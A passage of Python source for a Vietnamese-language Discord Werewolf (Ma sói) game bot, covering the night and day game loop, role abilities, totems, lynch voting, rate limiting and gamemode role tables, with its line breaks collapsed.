ko nhận đc tin nhắn, hãy báo {}.:scream:".format('> <@'.join(sort_players(session[1])), session[6], len(session[1]), client.get_server(WEREWOLF_SERVER).get_member(OWNER_ID).name)) await assign_roles(session[6]) await game_loop() async def game_loop(ses=None): if ses: await client.send_message(client.get_channel(GAME_CHANNEL), PLAYERS_ROLE.mention + ", Chào mừng đến game Ma sói, 1 trờ chơi phổ biến.:smiley: " "Đang dùng chế độ chơi **{}** với **{}** người chơi.\nTất cả người chơi kiểm tra tin nhắn để xem tin nhắn từ tôi.:joy: " "Nếu bạn không nhận được tin nhắn nào, hãy để {} biết.:scream:".format(session[6], len(session[1]), client.get_server(WEREWOLF_SERVER).get_member(OWNER_ID).name)) globals()['session'] = ses await log(1, str(session)) first_night = True # GAME START while win_condition() == None and session[0]: log_msg = '' for player in session[1]: member = client.get_server(WEREWOLF_SERVER).get_member(player) role = get_role(player, 'role') if role in ['shaman', 'crazed shaman'] and session[1][player][0]: if role == 'shaman': session[1][player][2] = random.choice(SHAMAN_TOTEMS) elif role == 'crazed shaman': session[1][player][2] = random.choice(list(totems)) log_msg += "{} ({}) HAS {}".format(get_name(player), player, session[1][player][2]) + '\n' elif role == 'hunter' and session[1][player][0] and 'hunterbullet' not in session[1][player][4]: session[1][player][2] = player if first_night: await _send_role_info(player) else: await _send_role_info(player, sendrole=False) await log(1, 'SUNSET LOG:\n' + log_msg) if session[3][0] == 0: first_night = False # NIGHT session[3][0] = datetime.now() await client.send_message(client.get_channel(GAME_CHANNEL), ":full_moon: Bây giờ là **ban đêm**.:full_moon:") warn = False while win_condition() == None and not session[2] and session[0]: end_night = True for player in session[1]: if session[1][player][0] and session[1][player][1] in 
['wolf', 'werecrow', 'werekitten', 'sorcerer', 'seer', 'harlot', 'hunter']: end_night = end_night and (session[1][player][2] != '') if session[1][player][0] and session[1][player][1] in ['shaman', 'crazed shaman']: end_night = end_night and (session[1][player][2] in session[1]) end_night = end_night or (datetime.now() - session[3][0]).total_seconds() > NIGHT_TIMEOUT if end_night: session[2] = True session[3][1] = datetime.now() # attempted fix for using !time right as night ends if (datetime.now() - session[3][0]).total_seconds() > NIGHT_WARNING and warn == False: warn = True await client.send_message(client.get_channel(GAME_CHANNEL), "**:full_moon: Một vài dân làng dậy sớm và nhận thấy trời vẫn chưa sáng. " "Đêm thì sắp tàn mà vẫn còn có tiếng nói chuyện của dân làng.:full_moon:**") await asyncio.sleep(0.1) night_elapsed = datetime.now() - session[3][0] session[4][0] += night_elapsed # BETWEEN NIGHT AND DAY session[3][1] = datetime.now() # fixes using !time screwing stuff up killed_msg = '' killed_dict = {} for player in session[1]: killed_dict[player] = 0 killed_players = [] hunter_kill = None alive_players = sort_players(x for x in session[1] if session[1][x][0]) log_msg = "SUNRISE LOG:\n" if session[0]: for player in alive_players: role = get_role(player, 'role') if role in ['shaman', 'crazed shaman'] and session[1][player][2] in totems: totem_target = random.choice([x for x in alive_players if x != player]) totem = session[1][player][2] session[1][totem_target][4].append(totem) session[1][player][2] = totem_target log_msg += player + '\'s ' + totem + ' given to ' + totem_target + "\n" member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: try: random_given = "wtf? this is a bug; pls report to admins" if role == 'shaman': random_given = "Vì bạn quên không đưa bùa cho ai cả, **{0}** của bạn đã được ngẫu nhiên gửi đến cho **{1}**.:smiling_imp:".format( totem.replace('_', ' '), get_name(totem_target)) elif role == 'crazed shaman': random_given = "Vì bạn quên không đưa bùa cho ai, bùa đã được ngẫu nhiên gửi cho **{0}**.:smiling_imp:".format(get_name(totem_target)) await client.send_message(member, random_given) except discord.Forbidden: pass elif role == 'harlot' and session[1][player][2] == '': member = client.get_server(WEREWOLF_SERVER).get_member(player) session[1][player][2] = player log_msg += "{0} ({1}) STAY HOME".format(get_name(player), player) + "\n" if member: try: await client.send_message(member, "Bạn sẽ ở nhà đêm nay.") except discord.Forbidden: pass elif role == 'hunter' and session[1][player][2] == '': member = client.get_server(WEREWOLF_SERVER).get_member(player) session[1][player][2] = player log_msg += "{0} ({1}) PASS".format(get_name(player), player) + "\n" if member: try: await client.send_message(member, "Bạn đã chọn không giết ai tối nay.:scream:") except discord.Forbidden: pass # BELUNGA for player in [x for x in session[1] if session[1][x][0]]: for i in range(session[1][player][4].count('belunga_totem')): session[1][player][4].append(random.choice(list(totems) + ['belunga_totem', 'bullet'])) if random.random() < 0.1 and 'gunner' not in get_role(player, 'templates'): session[1][player][3].append('gunner') # Wolf kill wolf_votes = {} wolf_killed = None gunner_revenge = [] wolf_deaths = [] wolf_turn = [] for player in alive_players: if get_role(player, 'role') in ACTUAL_WOLVES: if session[1][player][2] in wolf_votes: wolf_votes[session[1][player][2]] += 1 elif session[1][player][2] != "": wolf_votes[session[1][player][2]] = 1 if wolf_votes != {}: 
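                # Plurality rule for the wolves' kill: the most-voted target
                # wins only if the vote is untied; an exact tie means the pack
                # fails to agree and nobody is attacked tonight.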
max_votes = max([wolf_votes[x] for x in wolf_votes]) temp_players = [] for target in wolf_votes: if wolf_votes[target] == max_votes: temp_players.append(target) if len(temp_players) == 1: wolf_killed = temp_players[0] log_msg += "WOLFKILL: {} ({})".format(get_name(wolf_killed), wolf_killed) + "\n" if get_role(wolf_killed, 'role') == 'harlot' and session[1][wolf_killed][2] != wolf_killed: killed_msg += "Nạn nhân của sói không ở nhà đêm nay và né được đòn tấn công của sói.:joy:\n" else: killed_dict[wolf_killed] += 1 wolf_deaths.append(wolf_killed) # Harlot stuff for harlot in [x for x in alive_players if get_role(x, 'role') == 'harlot']: visited = session[1][harlot][2] if visited != harlot: if visited == wolf_killed and not 'protection_totem' in session[1][visited][4]: killed_dict[harlot] += 1 killed_msg += "**{}** đã chết vào đêm qua.:skull: ".format(get_name(harlot)) wolf_deaths.append(harlot) elif visited in [x for x in session[1] if get_role(x, 'role') in ACTUAL_WOLVES]: killed_dict[harlot] += 1 killed_msg += "**{}** đã chết vào đêm qua.:skull:\n".format(get_name(harlot)) wolf_deaths.append(harlot) # Hunter stuff for hunter in [x for x in session[1] if get_role(x, 'role') == 'hunter']: target = session[1][hunter][2] if target not in [hunter, '']: if 'hunterbullet' in session[1][hunter][4]: session[1][hunter][4].remove('hunterbullet') killed_dict[target] += 100 # Totem stuff totem_holders = [] protect_totemed = [] death_totemed = [] revengekill = "" for player in sort_players(session[1]): if len([x for x in session[1][player][4] if x in totems]) > 0: totem_holders.append(player) prot_tots = 0 death_tots = 0 death_tots += session[1][player][4].count('death_totem') killed_dict[player] += death_tots if get_role(player, 'role') != 'harlot' or session[1][player][2] == player: # fix for harlot with protect prot_tots = session[1][player][4].count('protection_totem') killed_dict[player] -= prot_tots if wolf_killed == player and 'protection_totem' in session[1][player][4] and killed_dict[player] < 1: protect_totemed.append(player) if 'death_totem' in session[1][player][4] and killed_dict[player] > 0 and death_tots - prot_tots > 0: death_totemed.append(player) if 'cursed_totem' in session[1][player][4]: if 'cursed' not in get_role(player, 'templates'): session[1][player][3].append('cursed') if player in wolf_deaths and killed_dict[player] > 0 and player not in death_totemed: # player was targeted and killed by wolves if session[1][player][4].count('lycanthropy_totem') > 0: killed_dict[player] = 0 wolf_turn.append(player) await wolfchat("{} is now a **wolf**!".format(get_name(player))) try: member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: await client.send_message(member, "Bạn tỉnh dậy và thấy đau nhói, bạn nhận ra bạn đã bị tấn công bởi sói :scream: " "Bùa bạn đang giữ cháy sáng :fire: , và bạn biến thành sói! 
:scream:") except discord.Forbidden: pass elif session[1][player][4].count('retribution_totem') > 0: revenge_targets = [x for x in session[1] if session[1][x][0] and get_role(x, 'role') in [ 'wolf', 'werecrow', 'werekitten']] if get_role(player, 'role') == 'harlot' and get_role(session[1][player][2], 'role') in [ 'wolf', 'werecrow', 'werekitten']: revenge_targets[:] = [session[1][player][2]] else: revenge_targets[:] = [x for x in revenge_targets if session[1][x][2] == wolf_killed] revengekill = random.choice(revenge_targets) killed_dict[revengekill] += 100 if killed_dict[revengekill] > 0: killed_msg += "Khi bị tấn công vào đêm qua, **{}** cầm lá bùa đang cháy sáng :fire:. Thi thể của **{}**".format( get_name(wolf_killed), get_name(revengekill)) killed_msg += ", được tìm thấy ở hiện trường.:skull:\n".format(get_role(revengekill, 'role')) other = session[1][player][4][:] for o in other[:]: # hacky way to get specific totems to last 2 nights if o in ['death_totem', 'protection_totem', 'cursed_totem', 'retribution_totem', 'lycanthropy_totem2', 'deceit_totem2']: other.remove(o) elif o == 'lycanthropy_totem': other.remove(o) other.append('lycanthropy_totem2') elif o == 'deceit_totem': other.remove(o) other.append('deceit_totem2') session[1][player][4] = other for player in sort_players(wolf_deaths): if 'gunner' in get_role(player, 'templates') and \ session[1][player][4].count('bullet') > 0 and killed_dict[player] > 0: if random.random() < GUNNER_REVENGE_WOLF: revenge_targets = [x for x in session[1] if session[1][x][0] and get_role(x, 'role') in [ 'wolf', 'werecrow', 'werekitten']] if get_role(player, 'role') == 'harlot' and get_role(session[1][player][2], 'role') in [ 'wolf', 'werecrow', 'werekitten']: revenge_targets[:] = [session[1][player][2]] else: revenge_targets[:] = [x for x in revenge_targets if session[1][x][2] == wolf_killed] revenge_targets[:] = [x for x in revenge_targets if x not in gunner_revenge] if revenge_targets: target = random.choice(revenge_targets) gunner_revenge.append(target) session[1][player][4].remove('bullet') killed_dict[target] += 100 if killed_dict[target] > 0: killed_msg += "May thay **{}** có súng và đạn nên **{}** bị bắn chết.:joy:\n".format( get_name(player), get_name(target), get_role(target, 'death')) if session[1][player][4].count('bullet') > 0: give_gun_targets = [x for x in session[1] if session[1][x][0] and get_role(x, 'role') in WOLFCHAT_ROLES] if len(give_gun_targets) > 0: give_gun = random.choice(give_gun_targets) if not 'gunner' in get_role(give_gun, 'templates'): session[1][give_gun][3].append('gunner') session[1][give_gun][4].append('bullet') member = client.get_server(WEREWOLF_SERVER).get_member(give_gun) if member: try: await client.send_message(member, "Khi đang lục lọi nhà của **{}**, bạn tìm thấy 1 khẩu súng được nạp 1 " "viên đạn bạc! Bạn chỉ có thể xài súng vào ban ngày. Nếu bạn bắn trúng sói, bạn sẽ cố tình bắt trượt. 
Nếu " "bạn bắn dân làng, khả năng cao là họ sẽ bị thương.".format(get_name(player))) except discord.Forbidden: pass for player in killed_dict: if killed_dict[player] > 0: killed_players.append(player) killed_players = sort_players(killed_players) for player in killed_players: member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: await client.remove_roles(member, PLAYERS_ROLE) killed_temp = killed_players[:] log_msg += "PROTECT_TOTEMED: " + ", ".join("{} ({})".format(get_name(x), x) for x in protect_totemed) + "\n" log_msg += "DEATH_TOTEMED: " + ", ".join("{} ({})".format(get_name(x), x) for x in death_totemed) + "\n" log_msg += "PLAYERS TURNED WOLF: " + ", ".join("{} ({})".format(get_name(x), x) for x in wolf_turn) + "\n" if revengekill: log_msg += "RETRIBUTED: " + "{} ({})\n".format(get_name(revengekill), revengekill) if gunner_revenge: log_msg += "GUNNER_REVENGE: " + ", ".join("{} ({})".format(get_name(x), x) for x in gunner_revenge) + "\n" log_msg += "DEATHS FROM WOLF: " + ", ".join("{} ({})".format(get_name(x), x) for x in wolf_deaths) + "\n" log_msg += "KILLED PLAYERS: " + ", ".join("{} ({})".format(get_name(x), x) for x in killed_players) + "\n" await log(1, log_msg) if protect_totemed != []: for protected in sort_players(protect_totemed): killed_msg += "**{0}** bị tấn công đêm qua, nhưng lá bùa của họ đã cháy sáng :fire:, gây chói lóa kẻ sát nhân giúp họ chạy trốn.:joy:\n".format( get_name(protected)) if death_totemed != []: for ded in sort_players(death_totemed): killed_msg += "**{0}** giữ một lá bùa đang bùng cháy :fire:. Thi thể của **{0}** được phát hiện tại hiện trường.:skull:\n".format( get_name(ded), get_role(ded, 'death')) killed_players.remove(ded) if revengekill != "" and revengekill in killed_players: # retribution totem killed_players.remove(revengekill) for player in gunner_revenge: if player in killed_players: killed_players.remove(player) if len(killed_players) == 0: if protect_totemed == [] and death_totemed == [] and get_role(wolf_killed, 'role') != 'harlot': killed_msg += random.choice(lang['nokills']) + '\n' elif len(killed_players) == 1: killed_msg += ":skull: Thi thể của **{}** được phát hiện. Ai nấy đều xót xa.:cry:\n".format(get_name(killed_players[0]), get_role(killed_players[0], 'death')) else: killed_msg += ":skull: Thi thể của **{}**, và **{}** được tìm thấy. Dân làng than khóc.:cry:\n".format( '**, **'.join(get_name(x) + '**,' + get_role(x, 'death') for x in killed_players[:-1]), get_name(killed_players[-1]), get_role(killed_players[-1], 'death')) if session[0] and win_condition() == None: await client.send_message(client.get_channel(GAME_CHANNEL), ":full_moon: Đêm tối dài **{0:02d}:{1:02d}**. 
Dân làng thức dậy và tìm kiếm khắp làng.\n\n{2}".format( night_elapsed.seconds // 60, night_elapsed.seconds % 60, killed_msg)) if session[0] and win_condition() == None: totem_holders = sort_players(totem_holders) if len(totem_holders) == 0: pass elif len(totem_holders) == 1: await client.send_message(client.get_channel(GAME_CHANNEL), random.choice(lang['hastotem']).format(get_name(totem_holders[0]))) elif len(totem_holders) == 2: await client.send_message(client.get_channel(GAME_CHANNEL), random.choice(lang['hastotem2']).format(get_name(totem_holders[0]), get_name(totem_holders[1]))) else: await client.send_message(client.get_channel(GAME_CHANNEL), random.choice(lang['hastotems']).format('**, **'.join([get_name(x) for x in totem_holders[:-1]]), get_name(totem_holders[-1]))) for player in killed_temp: session[1][player][0] = False for player in wolf_turn: session[1][player][1] = 'wolf' for player in session[1]: session[1][player][2] = '' if session[0] and win_condition() == None: await check_traitor() # DAY session[3][1] = datetime.now() if session[0] and win_condition() == None: await client.send_message(client.get_channel(GAME_CHANNEL), ":sun_with_face: Bây giờ là **ban ngày**. dùng `{}lynch <player>` đều bầu giết <player>. :smiley:".format(BOT_PREFIX)) for player in session[1]: if session[1][player][0] and 'blinding_totem' in session[1][player][4]: if 'injured' not in session[1][player][4]: session[1][player][4].append('injured') for i in range(session[1][player][4].count('blinding_totem')): session[1][player][4].remove('blinding_totem') try: member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: await client.send_message(member, ":dizzy_face: Lá bùa bạn đang cầm bùng cháy. " "Bạn thấy lóa mắt và có vẻ như nó sẽ không khỏi " "nên bạn đi nghỉ...:dizzy_face:") except discord.Forbidden: pass lynched_player = None warn = False totem_dict = {} # For impatience and pacifism while win_condition() == None and session[2] and lynched_player == None and session[0]: for player in [x for x in session[1]]: totem_dict[player] = session[1][player][4].count('impatience_totem') - session[1][player][4].count('pacifism_totem') vote_dict = get_votes(totem_dict) if vote_dict['abstain'] >= len([x for x in session[1] if session[1][x][0] and 'injured' not in session[1][x][4]]) / 2: lynched_player = 'abstain' max_votes = max([vote_dict[x] for x in vote_dict]) max_voted = [] if max_votes >= len([x for x in session[1] if session[1][x][0] and 'injured' not in session[1][x][4]]) // 2 + 1: for voted in vote_dict: if vote_dict[voted] == max_votes: max_voted.append(voted) lynched_player = random.choice(max_voted) if (datetime.now() - session[3][1]).total_seconds() > DAY_TIMEOUT: session[3][0] = datetime.now() # hopefully a fix for time being weird session[2] = False if (datetime.now() - session[3][1]).total_seconds() > DAY_WARNING and warn == False: warn = True await client.send_message(client.get_channel(GAME_CHANNEL), "**:smiling_imp: Khi dân làng nhận ra mặt trời đã gần khuất núi " "ánh chiều tà ngả dần sang bóng tối, họ nhận ra rằng còn rất ít thời gian để thống nhất nên treo " "ai; Nếu họ không thống nhất thì đa số sẽ thắng thiểu số. 
Và sẽ không ai bị treo nếu " "không ai bầu hoặc vote hòa nhau.:smiling_imp:**") await asyncio.sleep(0.1) if not lynched_player and win_condition() == None and session[0]: vote_dict = get_votes(totem_dict) max_votes = max([vote_dict[x] for x in vote_dict]) max_voted = [] for voted in vote_dict: if vote_dict[voted] == max_votes and voted != 'abstain': max_voted.append(voted) if len(max_voted) == 1: lynched_player = max_voted[0] if session[0]: session[3][0] = datetime.now() # hopefully a fix for time being weird day_elapsed = datetime.now() - session[3][1] session[4][1] += day_elapsed lynched_msg = "" if lynched_player and win_condition() == None and session[0]: if lynched_player == 'abstain': for player in [x for x in totem_dict if session[1][x][0] and totem_dict[x] < 0]: lynched_msg += "**{}** không muốn bầu treo cổ hôm nay :pray:.\n".format(get_name(player)) lynched_msg += "Dân làng hùa nhau éo treo ai :rage:." await client.send_message(client.get_channel(GAME_CHANNEL), lynched_msg) else: for player in [x for x in totem_dict if session[1][x][0] and totem_dict[x] > 0 and x != lynched_player]: lynched_msg += "**{}** đã nóng vội bầu treo cổ **{}** :dizzy_face:.\n".format(get_name(player), get_name(lynched_player)) lynched_msg += '\n' if 'revealing_totem' in session[1][lynched_player][4]: lynched_msg += ':scream: Khi dân làng đang chuẩn bị treo cổ **{0}**, Là bùa của họ bùng cháy! Khi dân làng hết bị lóa mắt, ' lynched_msg += 'họ nhận ra {0} đã trốn thoát! Lá bùa bị bỏ lại nói rằng kẻ trốn thoát là **{1}** :scream:.' lynched_msg = lynched_msg.format(get_name(lynched_player), get_role(lynched_player, 'role')) await client.send_message(client.get_channel(GAME_CHANNEL), lynched_msg) else: lynched_msg += random.choice(lang['lynched']).format(get_name(lynched_player)) await client.send_message(client.get_channel(GAME_CHANNEL), lynched_msg) session[1][lynched_player][0] = False member = client.get_server(WEREWOLF_SERVER).get_member(lynched_player) if member: await client.remove_roles(member, PLAYERS_ROLE) if get_role(lynched_player, 'role') == 'fool' and 'revealing_totem' not in session[1][lynched_player][4]: win_msg = ":joy: Chúc mừng! Các bạn đã treo cổ thằng ngu! Nó thắng rồi ahihi! :joy:\n\n" + end_game_stats() await end_game(win_msg, [lynched_player]) return elif lynched_player == None and win_condition() == None and session[0]: await client.send_message(client.get_channel(GAME_CHANNEL), "Không đủ phiếu bầu để treo cổ.:wave:") # BETWEEN DAY AND NIGHT session[2] = False if session[0] and win_condition() == None: await client.send_message(client.get_channel(GAME_CHANNEL), ":zzz: Ngày kéo dài **{0:02d}:{1:02d}**. 
Dân làng vì quá mệt mỏi nên đã đi ngủ.:zzz:".format( day_elapsed.seconds // 60, day_elapsed.seconds % 60)) for player in session[1]: session[1][player][4][:] = [x for x in session[1][player][4] if x not in [ 'revealing_totem', 'influence_totem', 'impatience_totem', 'pacifism_totem', 'injured']] session[1][player][2] = '' if session[0] and win_condition() == None: await check_traitor() if session[0]: win_msg = win_condition() await end_game(win_msg[1], win_msg[2]) async def start_votes(player): start = datetime.now() while (datetime.now() - start).total_seconds() < 60: votes_needed = max(2, min(len(session[1]) // 4 + 1, 4)) votes = len([x for x in session[1] if session[1][x][1] == 'start']) if votes >= votes_needed or session[0] or votes == 0: break await asyncio.sleep(0.1) else: for player in session[1]: session[1][player][1] = '' await client.send_message(client.get_channel(GAME_CHANNEL), "Không đủ phiếu bắt đầu game, bắt đầu bầu lại.") async def rate_limit(message): if not (message.channel.is_private or message.content.startswith(BOT_PREFIX)) or message.author.id in ADMINS or message.author.id == OWNER_ID: return False global ratelimit_dict global IGNORE_LIST if message.author.id not in ratelimit_dict: ratelimit_dict[message.author.id] = 1 else: ratelimit_dict[message.author.id] += 1 if ratelimit_dict[message.author.id] > IGNORE_THRESHOLD: if not message.author.id in IGNORE_LIST: IGNORE_LIST.append(message.author.id) await log(2, message.author.name + " (" + message.author.id + ") was added to the ignore list for rate limiting.") try: await reply(message, "Bạn đã xài {0} lệnh trong {1} giây; Tôi sẽ bơ bạn đến hết game.:rage:".format(IGNORE_THRESHOLD, TOKEN_RESET)) except discord.Forbidden: await client.send_message(client.get_channel(GAME_CHANNEL), message.author.mention + " xài {0} lệnh trong {1} giây và bạn sẽ bị bơ đến cuối game.:rage:".format(IGNORE_THRESHOLD, TOKEN_RESET)) finally: return True if message.author.id in IGNORE_LIST or ratelimit_dict[message.author.id] > TOKENS_GIVEN: if ratelimit_dict[message.author.id] > TOKENS_GIVEN: await log(2, "Ignoring message from " + message.author.name + " (" + message.author.id + "): `" + message.content + "` since no tokens remaining") return True return False async def do_rate_limit_loop(): await client.wait_until_ready() global ratelimit_dict while not client.is_closed: for user in ratelimit_dict: ratelimit_dict[user] = 0 await asyncio.sleep(TOKEN_RESET) async def game_start_timeout_loop(): session[5] = datetime.now() while not session[0] and len(session[1]) > 0 and datetime.now() - session[5] < timedelta(seconds=GAME_START_TIMEOUT): await asyncio.sleep(0.1) if not session[0] and len(session[1]) > 0: session[0] = True await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.online) await client.send_message(client.get_channel(GAME_CHANNEL), "{0}, Game chờ quá lâu để bắt đầu nên đã bị hủy. 
" "Nếu bạn còn ở đây và vẫn muốn chơi, hãy gõ `..join` lần nữa.".format(PLAYERS_ROLE.mention)) perms = client.get_channel(GAME_CHANNEL).overwrites_for(client.get_server(WEREWOLF_SERVER).default_role) perms.send_messages = True await client.edit_channel_permissions(client.get_channel(GAME_CHANNEL), client.get_server(WEREWOLF_SERVER).default_role, perms) for player in list(session[1]): del session[1][player] member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: await client.remove_roles(member, PLAYERS_ROLE) session[0] = False session[3] = [0, 0] session[4] = [timedelta(0), timedelta(0)] session[6] = '' session[7] = {} async def backup_settings_loop(): while not client.is_closed: print("BACKING UP SETTINGS") with open(NOTIFY_FILE, 'w') as notify_file: notify_file.write(','.join([x for x in notify_me if x != ''])) with open(STASIS_FILE, 'w') as stasis_file: json.dump(stasis, stasis_file) await asyncio.sleep(BACKUP_INTERVAL) ############## POST-DECLARATION STUFF ############### COMMANDS_FOR_ROLE = {'see' : ['seer'], 'kill' : ['wolf', 'werecrow', 'werekitten', 'hunter'], 'give' : ['shaman'], 'visit' : ['harlot'], 'shoot' : ['gunner'], 'observe' : ['werecrow', 'sorcerer'], 'pass' : ['harlot', 'hunter'], 'id' : ['detective']} GAMEPLAY_COMMANDS = ['join', 'j', 'start', 'vote', 'lynch', 'v', 'abstain', 'abs', 'nl', 'stats', 'leave', 'q', 'role', 'roles'] GAMEPLAY_COMMANDS += list(COMMANDS_FOR_ROLE) # {role name : [team, plural, description]} roles = {'wolf' : ['wolf', 'wolves', "Mục tiêu của bạn là giết hết tất cả dân làng. Gõ `kill <player>` trong tin nhắn với bot để giết người bạn chọn."], 'werecrow' : ['wolf', 'werecrows', "Bạn theo phe sói. Dùng `observe <player>` vào ban đêm để xem người bạn chọn có đang trên giường hay không. " "Bạn cũng có thể xài `kill <player>` để giết người bạn chọn."], 'werekitten' : ['wolf', 'werekittens', "Bạn thuộc sói-squad. Nhưng vì bạn quá dễ thương :3 nên nếu bị soi bạn sẽ không khả nghi " "và kẻ có súng sẽ luôn bắn trượt bạn. Dùng `kill <player>` trong tin nhắn riêng với bot " "để bầu chọn giết <player>."], 'traitor' : ['wolf', 'traitors', "Bạn giống y hệt dân làng, nhưng bạn theo phe sói. Chỉ có thám tử mới có thể lật tẩy danh tính " "thật. Khi tất cả sói chết, bạn trở thành sói."], 'sorcerer' : ['wolf', 'sorcerers', "Bạn có thể dùng lệnh `observe <player>` trong tin nhắn riêng với bot vào ban đêm để xem người đó " "có phải là tiên tri hay không. Bạn sẽ không bị soi bởi tiên tri và chỉ có detective mới có thể soi ra bạn."], 'cultist' : ['wolf', 'cultists', "Vai trò của bạn là hỗ trợ phe sói giết hết dân làng."], 'seer' : ['village', 'seers', "Vai trò của bạn là nhận diện sói; Bạn có 1 lần soi mỗi đêm. Gõ `see <player>` trong tin nhắn riêng với bot để xem vai người bạn chọn."], 'shaman' : ['village', 'shamans', "Bạn chọn 1 người mỗi đêm để đưa bùa chú bằng lệnh `give <player>`. Bạn có thể tự cho mình bùa, nhưng bạn không cho cùng 1" " người bùa 2 đêm liên tiếp. Nếu bạn không xài lệnh, bùa sẽ được phát ngẫu nhiên. " "Để xem bùa mình đang có, dùng lệnh `myrole`."], 'harlot' : ['village', 'harlots', "Bạn có thể 'ngủ' cùng 1 người mỗi đêm bằng lệnh `visit <player>`. Nếu bạn ngủ cùng mục tiêu của sói, hay ngủ cùng sói, " "bạn sẽ chết. Bạn có thể tự ngủ với chính mình để ở nhà."], 'hunter' : ['village', 'hunters', "Vai trò của bạn là giúp giết hết sói. Mỗi game bạn có thể giết 1 người sử dụng lệnh `kill <player>`. 
" "Nếu không muốn giết ai đêm nay, dùng lệnh `pass`."], 'detective' : ['village', 'detectives', "Nhiệm vụ của bạn là chỉ ra sói và kẻ phản bội (traitor). Vào BUỔI SÁNG, bạn có thể xài `id <player>` trong tin nhắn riêng với bot " "để xác định vai người được chọn. Nhưng bạn sẽ có {}% khả năng bị lộ vai cho phe sói mỗi lần bạn sử dụng lệnh.".format(int(DETECTIVE_REVEAL_CHANCE * 100))], 'villager' : ['village', 'villagers', "Khả năng đặc biệt nhất, chết khi bị giết. Ngoài ra éo có gì đặc biệt hơn. Bạn giúp dân làng bắt sói."], 'crazed shaman' : ['neutral', 'crazed shamans', "Bạn chọn 1 người để đưa bùa ngẫu nhiên bằng lệnh `give <player>`. Bạn có thể đưa bùa cho chính mình, " "nhưng không thể đưa 1 người 2 đêm liên tiếp. Nếu bạn không đưa bùa cho ai, " "bùa sẽ được phát ngẫu nhiên. Bạn thắng nếu bạn còn sống ở cuối game."], 'fool' : ['neutral', 'fools', "Bạn là người thắng nếu bạn bị treo cổ vào buổi sáng. Nếu không thì thua."], 'cursed villager' : ['template', 'cursed villagers', "Vai này bị ẩn và tiên tri sẽ coi người bị nguyền là sói. Các vai của sói, tiên tri, và thằng ngu không thể bị nguyền."], 'gunner' : ['template', 'gunners', "Vai này cho người chơi 1 khẩu súng lục. Gõ `shoot <player>` ở ROOM CHAT vào BAN NGÀY để giết <player>. " "Nếu bạn là dân và bắn sói, nó sẽ chết. Nếu không, sẽ có khả năng giết họ, gây chấn thương " ", hoặc súng nổ tung. Nếu bạn là sói mà bắn sói, bạn sẽ cố ý bắn trượt."]} gamemodes = { 'default' : { 'description' : "Gamemode mặc định.", 'min_players' : 4, 'max_players' : 20, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20 'wolf' : [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2], 'werecrow' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'werekitten' : [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'traitor' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'sorcerer' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1], 'cultist' : [0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0], 'seer' : [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2], 'shaman' : [0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2], 'harlot' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'hunter' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1], 'detective' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'villager' : [2, 3, 4, 3, 3, 3, 3, 4, 3, 3, 4, 4, 4, 5, 5, 6, 5], 'crazed shaman' : [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2], 'cursed villager' : [0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3], 'gunner' : [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]} }, 'test' : { 'description' : "Gamemode thử nghiệm, nên ko dùng.", 'min_players' : 5, 'max_players' : 20, 'roles' : { #4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20 'wolf' : [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2], 'werecrow' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'werekitten' : [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'traitor' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'sorcerer' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1], 'cultist' : [0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0], 'seer' : [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2], 'shaman' : [0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2], 'harlot' : [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'hunter' : [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1], 'detective' : [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], 'villager' : [2, 3, 4, 3, 3, 3, 3, 4, 3, 3, 4, 4, 4, 5, 5, 6, 5], 'crazed shaman' : [0, 0, 
